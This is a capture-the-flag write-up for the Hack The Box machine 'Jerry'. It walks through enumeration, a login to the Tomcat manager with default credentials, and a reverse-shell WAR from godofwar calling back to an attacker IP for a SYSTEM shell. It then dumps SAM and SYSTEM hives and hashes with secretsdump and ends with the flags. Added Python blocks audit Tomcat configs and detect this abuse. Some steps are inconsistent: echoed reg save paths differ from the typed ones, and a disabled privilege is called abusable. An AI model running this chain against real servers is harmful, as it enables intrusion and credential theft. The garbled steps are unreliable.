User Exploit
Nmap Enumeration
Quick Scan
┌──(wzwr㉿kali)-[~/Documents/htb/jerry]
└─$ sudo nmap -sT -Pn -T4 -vv 10.10.10.95
[sudo] password for wzwr:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-24 02:59 CDT
Initiating Parallel DNS resolution of 1 host. at 02:59
Completed Parallel DNS resolution of 1 host. at 02:59, 0.01s elapsed
Initiating Connect Scan at 02:59
Scanning 10.10.10.95 [1000 ports]
Discovered open port 8080/tcp on 10.10.10.95
Completed Connect Scan at 03:00, 12.89s elapsed (1000 total ports)
Nmap scan report for 10.10.10.95
Host is up, received user-set (0.081s latency).
Scanned at 2025-04-24 02:59:58 CDT for 13s
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE REASON
8080/tcp open http-proxy syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 12.92 seconds
Full Scan
┌──(wzwr㉿kali)-[~/Documents/htb/jerry]
└─$ sudo nmap -sT -Pn -T4 -vv -p- 10.10.10.95
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-24 03:01 CDT
Initiating Parallel DNS resolution of 1 host. at 03:01
Completed Parallel DNS resolution of 1 host. at 03:01, 0.00s elapsed
Initiating Connect Scan at 03:01
Scanning 10.10.10.95 [65535 ports]
Discovered open port 8080/tcp on 10.10.10.95
Connect Scan Timing: About 14.49% done; ETC: 03:05 (0:03:03 remaining)
Connect Scan Timing: About 44.62% done; ETC: 03:03 (0:01:16 remaining)
Completed Connect Scan at 03:03, 106.03s elapsed (65535 total ports)
Nmap scan report for 10.10.10.95
Host is up, received user-set (0.063s latency).
Scanned at 2025-04-24 03:01:29 CDT for 106s
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE REASON
8080/tcp open http-proxy syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 106.05 seconds
UDP Scan
┌──(wzwr㉿kali)-[~/Documents/htb/jerry]
└─$ sudo nmap -sU -Pn -T4 -vv 10.10.10.95
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-24 03:04 CDT
Initiating Parallel DNS resolution of 1 host. at 03:04
Completed Parallel DNS resolution of 1 host. at 03:04, 0.00s elapsed
Initiating UDP Scan at 03:04
Scanning 10.10.10.95 [1000 ports]
UDP Scan Timing: About 30.50% done; ETC: 03:05 (0:01:11 remaining)
UDP Scan Timing: About 60.50% done; ETC: 03:05 (0:00:40 remaining)
Completed UDP Scan at 03:05, 101.31s elapsed (1000 total ports)
Nmap scan report for 10.10.10.95
Host is up, received user-set.
Scanned at 2025-04-24 03:04:09 CDT for 101s
All 1000 scanned ports on 10.10.10.95 are in ignored states.
Not shown: 1000 open|filtered udp ports (no-response)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 101.36 seconds
Raw packets sent: 2088 (98.552KB) | Rcvd: 0 (0B)
Port 8080 Enumeration
Manual Enumeration
It seems to be an Apache Tomcat web server (the response carries a Server: Apache-Coyote/1.1 header).
Web Server Info
┌──(wzwr㉿kali)-[~]
└─$ curl 10.10.10.95:8080 -v
* Trying 10.10.10.95:8080...
* Connected to 10.10.10.95 (10.10.10.95) port 8080
> GET / HTTP/1.1
> Host: 10.10.10.95:8080
> User-Agent: curl/8.8.0
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< Server: Apache-Coyote/1.1
< Content-Type: text/html;charset=ISO-8859-1
< Transfer-Encoding: chunked
< Date: Thu, 24 Apr 2025 14:42:57 GMT
SearchSploit Tomcat
┌──(wzwr㉿kali)-[~/Documents/htb/jerry]
└─$ searchsploit -m 42953
Exploit: Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1)
URL: https://www.exploit-db.com/exploits/42953
Path: /usr/share/exploitdb/exploits/windows/webapps/42953.txt
Codes: CVE-2017-12615
Verified: False
File Type: ASCII text
Copied to: /home/wzwr/Documents/htb/jerry/42953.txt
┌──(wzwr㉿kali)-[~/Documents/htb/jerry]
└─$ searchsploit -m 42966
Exploit: Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)
URL: https://www.exploit-db.com/exploits/42966
Path: /usr/share/exploitdb/exploits/jsp/webapps/42966.py
Codes: CVE-2017-12617
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/wzwr/Documents/htb/jerry/42966.py
Gobuster
┌──(wzwr㉿kali)-[~/Documents/htb/jerry]
└─$ gobuster dir -u http://10.10.10.95:8080/ -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.95:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/[ (Status: 400) [Size: 0]
/] (Status: 400) [Size: 0]
/aux (Status: 200) [Size: 0]
/docs (Status: 302) [Size: 0] [--> /docs/]
/examples (Status: 302) [Size: 0] [--> /examples/]
/favicon.ico (Status: 200) [Size: 21630]
/manager (Status: 302) [Size: 0] [--> /manager/]
/plain] (Status: 400) [Size: 0]
/quote] (Status: 400) [Size: 0]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================
┌──(wzwr㉿kali)-[~/Documents/htb/jerry]
└─$ gobuster dir -u http://10.10.10.95:8080/ -w /usr/share/wordlists/SecLists-2024.4/Discovery/Web-Content/ApacheTomcat.fuzz.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.95:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists-2024.4/Discovery/Web-Content/ApacheTomcat.fuzz.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/examples (Status: 302) [Size: 0] [--> /examples/]
/examples/jsp/index.html (Status: 200) [Size: 17695]
/manager (Status: 302) [Size: 0] [--> /manager/]
/manager/text (Status: 401) [Size: 2536]
/manager/html/ (Status: 401) [Size: 2536]
/manager/jmxproxy (Status: 401) [Size: 2536]
/manager/status (Status: 401) [Size: 2536]
/manager/html (Status: 401) [Size: 2536]
/examples/jsp/snp/snoop.jsp (Status: 200) [Size: 618]
/examples/servlets/index.html (Status: 200) [Size: 7139]
/RELEASE-NOTES.txt (Status: 200) [Size: 9600]
/examples/jsp/source.jsp (Status: 500) [Size: 2387]
===============================================================
Finished
===============================================================
Default Credentials
By visiting /manager/html, we get a 401 page that includes an example of how to add a manager user account, with the credentials tomcat:s3cret. We can use these to log in by visiting /manager.
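The weakness here is a manager account whose credentials are the documented example pair, stored in plaintext in tomcat-users.xml. The following is an added example (not part of the original writeup) of a configuration audit a defender can run over that file: it flags users holding manager or admin roles, users whose credentials match a short, constructed list of well-known example pairs, and passwords stored without Tomcat's digest format. The sample tomcat-users.xml is constructed for the example; the role names are the standard Tomcat manager/host-manager roles.

```python
"""Audit a tomcat-users.xml for example credentials, plaintext passwords and
privileged roles. Added example; the sample file below is constructed."""
import xml.etree.ElementTree as ET

# Standard Tomcat roles that grant deploy or administrative access.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}

# Constructed list of well-known example pairs. tomcat:s3cret is the pair the
# manager's 401 page documents; the others appear (commented out) in the stock file.
KNOWN_EXAMPLE_CREDS = {("tomcat", "s3cret"), ("tomcat", "tomcat"), ("both", "tomcat"),
                       ("role1", "tomcat"), ("admin", "admin")}

# Constructed sample: one example-credential manager account, one digest-stored
# deploy account and one unprivileged account with a plaintext password.
SAMPLE_TOMCAT_USERS = """<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="admin-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,admin-gui"/>
  <user username="deploy" password="a1b2c3d4$1$9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08" roles="manager-script"/>
  <user username="reader" password="ReadOnly-long-passphrase-1" roles="probe"/>
</tomcat-users>
"""


def _local(tag):
    """Strip the XML namespace from an element tag ("{ns}user" -> "user")."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return a list of (username, issue) findings for a tomcat-users.xml document."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        if _local(el.tag) != "user":
            continue
        name = el.get("username") or el.get("name") or ""
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}

        if (name, password) in KNOWN_EXAMPLE_CREDS:
            findings.append((name, "known example credentials"))
        # Tomcat's digest credential handlers store salt$iterations$hash; a value
        # with no '$' separator is a plaintext password sitting in the config file.
        if password and "$" not in password:
            findings.append((name, "plaintext password"))
        privileged = roles & PRIVILEGED_ROLES
        if privileged:
            findings.append((name, "privileged roles: " + ", ".join(sorted(privileged))))
    return findings


if __name__ == "__main__":
    for user, issue in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{user:10s} {issue}")
```

Run against the real file (conf/tomcat-users.xml under the Tomcat install) by passing its contents to audit_tomcat_users; any account that shows both "known example credentials" and "privileged roles" is the exact condition exploited above.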
Authenticated Manager WebPage
It looks like we can upload a WAR file and have the web server deploy it instantly. Using https://github.com/KINGSABRI/godofwar, we can create a malicious reverse shell .war file.
┌──(wzwr㉿kali)-[~/Documents/htb/jerry/ReverseShell]
└─$ godofwar -p reverse_shell -H 10.10.16.15 -P 58787 -o evil
[ ℹ ] Creating Directory Structure:
✔ evil
✔ evil/WEB-INF
✔ evil/META-INF
✔ evil/WEB-INF/web.xml
✔ evil/META-INF/MANIFEST.MF
[ ℹ ] Setting up payload:
✔ reverse_shell.jsp ⟿ evil.jsp
✔ evil/evil.jsp
[ ℹ ] Cleaning up
[ ✔ ] Backdoor evil.war has been created.
Then we can visit /evil/evil.jsp to get the shell!
┌──(wzwr㉿kali)-[~/Documents/htb/jerry]
└─$ nc -lnvp 58787
listening on [any] 58787 ...
connect to [10.10.16.15] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
C:\apache-tomcat-7.0.88>
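Everything in the user exploit above leaves a trace in Tomcat's access log: repeated 401s on /manager while guessing credentials, a POST to /manager/html/upload by the now-authenticated user, and a first request to a context (/evil) that was never deployed by the administrator. The block below is an added example, not part of the original writeup, of detection logic over constructed log lines in the default "common" AccessLogValve pattern (%h %l %u %t "%r" %s %b). The baseline set of expected contexts and the CSRF nonce value in the sample are constructed; the manager endpoints are the real Tomcat 7+ paths, and the PUT rule covers the upload path of the CVE-2017-12617 entry found by searchsploit above.

```python
"""Detection rules for Tomcat manager abuse, run over constructed access-log lines.
Added example; not part of the original writeup."""
import re
from collections import Counter
from urllib.parse import urlsplit

# Default "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

# Constructed sample: three failed manager logins, a successful login, a WAR upload
# through the HTML manager, and the first hit on the freshly deployed context.
SAMPLE_LOG = """\
10.10.16.15 - - [24/Apr/2025:14:50:01 +0000] "GET /manager/html HTTP/1.1" 401 2536
10.10.16.15 - - [24/Apr/2025:14:50:03 +0000] "GET /manager/html HTTP/1.1" 401 2536
10.10.16.15 - - [24/Apr/2025:14:50:05 +0000] "GET /manager/html HTTP/1.1" 401 2536
10.10.16.15 - tomcat [24/Apr/2025:14:50:20 +0000] "GET /manager/html HTTP/1.1" 200 14789
10.10.16.15 - tomcat [24/Apr/2025:14:51:02 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=0123456789ABCDEF HTTP/1.1" 302 -
10.10.16.15 - - [24/Apr/2025:14:51:10 +0000] "GET /evil/evil.jsp HTTP/1.1" 200 -
10.10.10.5 - - [24/Apr/2025:14:52:00 +0000] "GET /docs/index.html HTTP/1.1" 200 4123
"""

# Constructed baseline of contexts the administrator actually deployed.
EXPECTED_CONTEXTS = {"", "ROOT", "docs", "examples", "manager", "host-manager"}

# Manager endpoints that create or replace a web application.
DEPLOY_PREFIXES = ("/manager/html/upload", "/manager/text/deploy")


def parse_log(text):
    """Parse access-log lines into dicts; lines not matching the pattern are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ev = m.groupdict()
            ev["path"] = urlsplit(ev["target"]).path  # drop any query string
            ev["status"] = int(ev["status"])
            events.append(ev)
    return events


def manager_auth_failures(events, threshold=3):
    """IPs with at least `threshold` 401 responses from the manager app (credential guessing)."""
    counts = Counter(ev["ip"] for ev in events
                     if ev["path"].startswith("/manager") and ev["status"] == 401)
    return {ip: n for ip, n in counts.items() if n >= threshold}


def deployment_events(events):
    """Requests that put code on the server: manager upload/deploy endpoints, or a raw
    PUT of a .jsp/.war file (the CVE-2017-12617 style upload)."""
    hits = []
    for ev in events:
        is_put_upload = ev["method"] == "PUT" and ev["path"].lower().endswith((".jsp", ".war"))
        if ev["path"].startswith(DEPLOY_PREFIXES) or is_put_upload:
            hits.append((ev["time"], ev["ip"], ev["user"], ev["method"], ev["path"]))
    return hits


def unexpected_contexts(events, expected=EXPECTED_CONTEXTS):
    """Context roots requested that are not in the baseline, keyed to their first request."""
    first_seen = {}
    for ev in events:
        ctx = ev["path"].split("/")[1] if ev["path"].startswith("/") else ""
        if ctx not in expected and ctx not in first_seen:
            first_seen[ctx] = (ev["time"], ev["ip"], ev["path"])
    return first_seen


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print("credential guessing:", manager_auth_failures(evs))
    print("deployments:", deployment_events(evs))
    print("unexpected contexts:", unexpected_contexts(evs))
```

The three rules are deliberately independent: the guessing rule fires even if the attacker never gets in, the deployment rule fires even when the login succeeded on the first try, and the context rule catches a WAR dropped into webapps/ by any other route (a PUT, or a shell that already exists on the host).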
Root Exploit
WHOAMI
C:\Users>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
=============================== ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
Note that SeImpersonatePrivilege and SeDebugPrivilege are enabled for this account. We might want to abuse them to exploit the server.
info
systeminfo
Host Name: JERRY
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-00112-46014-AA570
Original Install Date: 6/18/2018, 11:30:45 PM
System Boot Time: 4/24/2025, 5:39:30 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest
Total Physical Memory: 4,095 MB
Available Physical Memory: 3,410 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 4,094 MB
Virtual Memory: In Use: 705 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 142 Hotfix(s) Installed.
[01]: KB2868626
[02]: KB2883200
[03]: KB2887595
[04]: KB2894856
[05]: KB2903939
[06]: KB2911106
[07]: KB2919355
[08]: KB2919394
[09]: KB2928680
[10]: KB2938066
[11]: KB2954879
[12]: KB2967917
[13]: KB2977765
[14]: KB2978041
[15]: KB2978126
[16]: KB2989930
[17]: KB3000850
[18]: KB3003057
[19]: KB3004365
[20]: KB3004545
[21]: KB3012235
[22]: KB3012702
[23]: KB3013172
[24]: KB3013531
[25]: KB3013538
[26]: KB3013769
[27]: KB3013791
[28]: KB3013816
[29]: KB3014442
[30]: KB3015696
[31]: KB3018133
[32]: KB3019978
[33]: KB3021910
[34]: KB3023222
[35]: KB3023266
[36]: KB3024751
[37]: KB3024755
[38]: KB3029603
[39]: KB3030947
[40]: KB3032663
[41]: KB3033446
[42]: KB3035126
[43]: KB3036612
[44]: KB3037579
[45]: KB3037924
[46]: KB3038002
[47]: KB3042085
[48]: KB3044374
[49]: KB3044673
[50]: KB3045634
[51]: KB3045685
[52]: KB3045717
[53]: KB3045719
[54]: KB3045755
[55]: KB3045999
[56]: KB3046017
[57]: KB3046737
[58]: KB3054169
[59]: KB3054203
[60]: KB3054256
[61]: KB3054464
[62]: KB3055323
[63]: KB3055343
[64]: KB3055642
[65]: KB3059317
[66]: KB3060681
[67]: KB3060793
[68]: KB3061512
[69]: KB3063843
[70]: KB3071756
[71]: KB3074228
[72]: KB3074548
[73]: KB3076949
[74]: KB3077715
[75]: KB3078405
[76]: KB3078676
[77]: KB3080149
[78]: KB3082089
[79]: KB3084135
[80]: KB3084905
[81]: KB3086255
[82]: KB3087041
[83]: KB3087137
[84]: KB3091297
[85]: KB3094486
[86]: KB3095701
[87]: KB3097997
[88]: KB3098779
[89]: KB3099834
[90]: KB3100473
[91]: KB3102429
[92]: KB3103616
[93]: KB3103696
[94]: KB3103709
[95]: KB3109103
[96]: KB3109560
[97]: KB3109976
[98]: KB3110329
[99]: KB3115224
[100]: KB3121261
[101]: KB3121461
[102]: KB3123245
[103]: KB3126434
[104]: KB3126587
[105]: KB3133043
[106]: KB3133690
[107]: KB3134179
[108]: KB3134815
[109]: KB3137728
[110]: KB3138378
[111]: KB3138602
[112]: KB3138910
[113]: KB3138962
[114]: KB3139164
[115]: KB3139398
[116]: KB3139914
[117]: KB3140219
[118]: KB3140234
[119]: KB3145384
[120]: KB3145432
[121]: KB3146604
[122]: KB3146723
[123]: KB3146751
[124]: KB3147071
[125]: KB3155784
[126]: KB3156059
[127]: KB3159398
[128]: KB3161949
[129]: KB3162343
[130]: KB3172614
[131]: KB3172729
[132]: KB3173424
[133]: KB3175024
[134]: KB3178539
[135]: KB3179574
[136]: KB3185319
[137]: KB4033369
[138]: KB4033428
[139]: KB4054854
[140]: KB4096417
[141]: KB4287903
[142]: KB4284815
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.95
[02]: fe80::8d36:6e0:6b60:31a3
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Exploit
SeBackupPrivilege
Let's try to abuse SeBackupPrivilege first, as the most common technique.
C:\apache-tomcat-7.0.88>reg save hklm\system C:\apache-tomcat-7.0.88\webapps\docs\system.hive
reg save hklm\system C:\apache-tomcat-7.0.88\system.hive
The operation completed successfully.
C:\apache-tomcat-7.0.88>reg save hklm\sam C:\apache-tomcat-7.0.88\sam.hive
reg save hklm\sam C:\apache-tomcat-7.0.88\webapps\docs\sam.hive
The operation completed successfully.
Note that we save system.hive and sam.hive under webapps/docs so that we can download them by visiting /docs/system.hive and /docs/sam.hive.
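Staging registry hives under a web root so they can be fetched over HTTP is a common exfiltration pattern, and the file name is not a reliable signal (the attacker can call it logo.png). Registry hive files begin with the 4-byte signature "regf", so a defender can sweep the webapps tree by content instead. The block below is an added example, not from the original writeup; it builds a constructed webapps directory in a temp folder (a real doc page, a hive with the telltale extension and a hive renamed to look like an image) and returns every file whose header carries the hive signature.

```python
"""Find registry hive files staged under a web root by their 'regf' signature.
Added example; the sample directory tree is constructed in a temp folder."""
import os
import tempfile

HIVE_MAGIC = b"regf"  # signature at offset 0 of every Windows registry hive file


def find_staged_hives(root):
    """Return paths (relative to root) of files whose first 4 bytes are the hive signature."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as f:
                    head = f.read(len(HIVE_MAGIC))
            except OSError:
                continue  # unreadable file; skip rather than abort the sweep
            if head == HIVE_MAGIC:
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def build_sample_webapps():
    """Constructed webapps tree for the example. Returns the temp root directory."""
    root = tempfile.mkdtemp(prefix="webapps-")
    docs = os.path.join(root, "docs")
    os.makedirs(docs)
    with open(os.path.join(docs, "index.html"), "wb") as f:
        f.write(b"<html><body>Tomcat documentation</body></html>")
    # Minimal fake hive: only the signature matters for this check (constructed data).
    fake_hive = HIVE_MAGIC + b"\x00" * 60
    with open(os.path.join(docs, "system.hive"), "wb") as f:
        f.write(fake_hive)
    with open(os.path.join(docs, "logo.png"), "wb") as f:
        f.write(fake_hive)  # same content behind a harmless-looking extension
    return root


if __name__ == "__main__":
    sample_root = build_sample_webapps()
    for rel in find_staged_hives(sample_root):
        print("registry hive under web root:", rel)
```

On a real Tomcat host, point find_staged_hives at the webapps directory; any hit is worth treating as an incident, since no legitimate web application ships a registry hive.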
┌──(wzwr㉿kali)-[~/Documents/htb/jerry]
└─$ impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0x777873202c520da6e5ce6f10e419892b
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fe34b627386c89a49eb254f6a267e4d9:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
Final Exploit
Actually… we can just view the Administrator flags directly.
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0834-6C04
Directory of C:\Users\Administrator\Desktop
06/19/2018 07:09 AM <DIR> .
06/19/2018 07:09 AM <DIR> ..
06/19/2018 07:09 AM <DIR> flags
0 File(s) 0 bytes
3 Dir(s) 2,395,463,680 bytes free
C:\Users\Administrator\Desktop>cd flags
cd flags
C:\Users\Administrator\Desktop\flags>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0834-6C04
Directory of C:\Users\Administrator\Desktop\flags
06/19/2018 07:09 AM <DIR> .
06/19/2018 07:09 AM <DIR> ..
06/19/2018 07:11 AM 88 2 for the price of 1.txt
1 File(s) 88 bytes
2 Dir(s) 2,395,463,680 bytes free
C:\Users\Administrator\Desktop\flags>type 2\ for\ the\ price\ of\ 1.txt
type 2\ for\ the\ price\ of\ 1.txt
C:\Users\Administrator\Desktop\flags>type *.txt
type *.txt
user.txt
7004dbcef0f854e0fb401875f26ebd00
root.txt
04a8b36e1545a455393d067e772fe90e
C:\Users\Administrator\Desktop\flags>